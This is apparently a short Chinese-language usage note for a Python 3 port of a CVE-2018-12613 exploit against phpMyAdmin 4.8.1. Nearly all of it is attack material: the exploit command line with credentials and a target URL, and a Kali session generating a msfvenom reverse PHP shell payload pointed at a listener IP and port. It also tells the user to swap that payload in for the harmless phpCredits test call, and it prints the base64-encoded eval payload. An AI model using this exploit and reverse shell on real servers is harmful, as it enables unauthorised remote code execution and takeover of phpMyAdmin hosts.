修改后的独立利用脚本,已移植到 Python 3。测试环境:Python 3.7.3,phpMyAdmin 4.8.1 运行于 Ubuntu 16.04。 仅适用于 Linux。原始利用脚本来自 SSD。所有荣誉归功于他们。
python3 CVE-2018-12613.py -u phpMyAdmin -p password -U http:///[url-phpMyAdmin] –P ”phpcredits();”
PHP 代码的结果保存在 results.html 中
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# msfvenom --platform php -a php -e php/base64 -p php/reverse_php LHOST=192.168.92.134 LPORT=4444 -o payload.php
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4045 (iteration=0)
php/base64 chosen with final size 4045
Payload size: 4045 bytes
Saved as: payload.php
使用上述 msfvenom PHP 负载代替 phpcredits();
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# cat payload.php
eval(base64_decode(ICAg...gfQo));